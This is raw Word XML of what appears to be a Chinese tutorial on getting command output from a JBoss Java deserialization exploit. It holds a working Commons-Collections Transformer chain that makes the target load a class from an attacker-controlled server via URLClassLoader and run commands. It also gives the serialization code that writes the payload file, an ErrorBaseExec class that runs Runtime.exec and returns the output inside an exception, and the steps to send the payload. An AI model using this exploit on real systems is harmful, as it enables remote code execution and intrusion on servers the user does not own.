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66" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="12" w:color="3399CC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:after="150" w:line="630" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>回显思路和原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="375" w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体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这里使用JBoss漏洞实现回显进行说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766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textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="DD6751"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDEB"/>
        </w:rPr>
        <w:t>java.net.URLClassLoader</w:t>
      </w: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类，远程加载自定义类(放在自己服务器上的class文件)，可以自定义方法执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766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/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia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在自定义类中，抛出异常，使其成功随着Jboss报错返回命令执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="12" w:color="3399CC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:after="150" w:line="630" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x01 payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>写法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766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0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体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构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="DD6751"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDEB"/>
        </w:rPr>
        <w:t>URLClassLoader</w:t>
      </w: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执行链</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1458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4160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidTr="00FD2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 w:hint="eastAsia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3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4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5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6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7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8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9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10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11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12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13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14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15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16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17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18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19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20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21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22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23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24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25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26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27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lastRenderedPageBreak/>
              <w:t>28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141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Transformer[] transformers = new Transformer[] {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new ConstantTransformer(java.net.URLClassLoader.class),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new InvokerTransformer(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"getConstructor",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new Class[] {Class[].class},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new Object[] {new Class[]{java.net.URL[].class}}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),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new InvokerTransformer(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"newInstance",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new Class[] {Object[].class},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new Object[] { new Object[] { new java.net.URL[] { new java.net.URL(url) }}}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),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new InvokerTransformer(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"loadClass",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new Class[] { String.class },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new Object[] { "exploit.ErrorBaseExec" }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),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new InvokerTransformer(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"getMethod",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new Class[]{String.class, Class[].class},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new Object[]{"do_exec", new Class[]{String.class}}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),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new InvokerTransformer(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"invoke",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new Class[]{Object.class, Object[].class},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new Object[]{null, new String[]{cmd}}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)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};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FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体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lastRenderedPageBreak/>
        <w:t>执行链实际为：</w:t>
      </w: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br/>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="DD6751"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDEB"/>
        </w:rPr>
        <w:t>URLClassLoader.class.getConstructor(java.net.URL[].class).newInstance(new java.net.URL("url")).loadClass("remote_class").getMethod("do_exec", String.class).invoke(null, "cmd");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia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这样就</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="DD6751"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDEB"/>
        </w:rPr>
        <w:t>远程加载了exploit.ErrorBaseExec类，并执行了do_exec("cmd")方法</w:t>
      </w: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，而且是在目标机器上进行代码执行。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="148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4400"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidTr="00FD2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 w:hint="eastAsia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3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4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5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6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7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8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9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10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11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12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13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14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15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16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17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18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19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20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21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22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23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24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25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26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1441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  // </w:t>
            </w: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构造完整</w:t>
            </w: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payload</w:t>
            </w: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，使用</w:t>
            </w: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sun.reflect.annotation.AnnotationInvocationHandler</w:t>
            </w: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封装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Transformer transformerChain = new ChainedTransformer(transformers);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Map innerMap = new HashMap();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innerMap.put("value", "value");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/*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Map outerMap = TransformedMap.decorate(innerMap, null, transformedChain);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Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");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Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);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ctor.setAccessible(true);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Object instance = ctor.newInstance(Target.class, outerMap);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*/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Map outmap = TransformedMap.decorate(innerMap, null, transformerChain);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Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");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Constructor ctor = cls.getDeclaredConstructor(new Class[] { Class.class, Map.class });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ctor.setAccessible(true);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Object instance = ctor.newInstance(new Object[] { Retention.class, outmap });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File f = new File("payload_chaitin_urlloadclass.bin");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ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));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out.writeObject(instance);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out.flush();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out.close();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FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体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远程调用的ErrorBaseExec类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="375" w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia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lastRenderedPageBreak/>
        <w:t>将编译好的class文件传到自己可控的服务器上，这里最好使用jar包。为了省事直接使用class文件。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="148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4400"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidTr="00FD2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 w:hint="eastAsia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2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3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4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5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6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7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8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9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10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11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12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13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14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15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16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17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center"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="宋体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441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public class ErrorBaseExec {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public static void do_exec(String args) throws Exception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Process proc = Runtime.getRuntime().exec(args);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BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));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StringBuffer sb = new StringBuffer();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 line;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while ((line = br.readLine()) != null)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sb.append(line).append("\n");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 result = sb.toString();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Exception e=new Exception(result);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throw e;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 }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FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="baseline"/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</w:pPr>
            <w:r w:rsidRPr="00FD2766">
              <w:rPr>
                <w:rFonts w:ascii="inherit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FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体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这里将执行结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="DD6751"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBEDEB"/>
        </w:rPr>
        <w:t>result</w:t>
      </w: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封装在异常中抛出。 达到回显目的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="12" w:color="3399CC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:after="150" w:line="630" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0x02 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行步骤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766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/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体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执行以上代码生成payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766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/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia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将ErrorBaseExec类上传到自己服务器上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766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/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia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t>发送payload，得到命令执行后的回显</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="375" w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="2F2F2F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="13707110" cy="6978650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://i.imgur.com/3I3Uu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3I3Uus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711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766">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="2F2F2F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="2F2F2F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7625715" cy="569595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://i.imgur.com/L1Vy2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L1Vy2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66" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="12" w:color="3399CC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:after="150" w:line="630" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0x03 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD2766">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft Yahei" w:hAnsi="Microsoft Yahei" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD2766" w:rsidRPr="00FD2766" w:rsidRDefault="00FD2766" w:rsidP="00FD2766">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="2F2F2F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00FD2766">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="72BFC5"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>http://blog.nsfocus.net/java-deserialization-vulnerability-comments/</w:t>
        </w:r>
      </w:hyperlink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CFC" w:rsidRDefault="00D63CFC" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D63CFC" w:rsidRDefault="00D63CFC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FD2766">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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FD2766">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>5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CFC" w:rsidRDefault="00D63CFC" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D63CFC" w:rsidRDefault="00D63CFC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D63CF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D63CFC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D63CF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4C2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65A6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5AAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="399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37A7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08F6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82DBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="326A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36E9"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000B36E9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3CFC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42769BA-67A5-4DE1-AFA5-B5FF1694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FD276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D2766"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/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FD27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D2766"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-r">
    <w:name w:val="crayon-r"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-e">
    <w:name w:val="crayon-e"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-t">
    <w:name w:val="crayon-t"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-s">
    <w:name w:val="crayon-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-c">
    <w:name w:val="crayon-c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-m">
    <w:name w:val="crayon-m"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-st">
    <w:name w:val="crayon-st"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FD2766"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD2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9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9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1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blog.nsfocus.net/java-deserialization-vulnerability-commen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254CB-B262-4073-97C2-1B0DD605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2017-02-17T13:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-17T13:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>